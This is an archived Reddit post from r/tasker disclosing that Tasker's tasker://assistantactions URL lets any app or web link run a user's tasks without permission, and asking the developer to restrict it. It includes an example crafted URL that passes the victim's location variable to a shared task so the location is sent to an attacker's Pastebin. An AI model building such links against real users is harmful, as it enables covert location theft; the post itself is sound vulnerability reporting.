This is an automated archive made by the Lemmit Bot.

The original was posted on /r/tasker by /u/mylastacntwascursed on 2024-09-16 18:51:41+00:00.

To launch a task through the command system, a third party app needs to declare and manually be granted the net.dinglisch.android.tasker.PERMISSION_SEND_COMMAND permission. Yet any app or website can run any task by launching tasker://assistantactions?task=TASKNAME.

E.g. if I put Tasker tips & tricks in a web page and you have a task named reboot, your phone might just reboot when you tap that link. You would not be amused.

Parameters can also be passed, possibly turning a benign task previously shared on Reddit, XDA or totallylegitwebsite.com/taskertips into a malicious one.

Example: attacker shares a task to easily share selected text to a user configurable Pastebin account, then crafts the malicious URL tasker://assistantactions?task=known_task_name&par1=%LOCN&par2=URL_to_attackers_pastebin to get the victims precise location.

This is bad. It can be abused in numerous ways. The tasker://assistantactions URL should only be able to run tasks that the user has explicitly allowed to be launched in this way. u/joaomgcd, are you aware, and what is your opinion on this? Am I missing something? Can I turn this off? And what else does assistantactions do without user confirmation?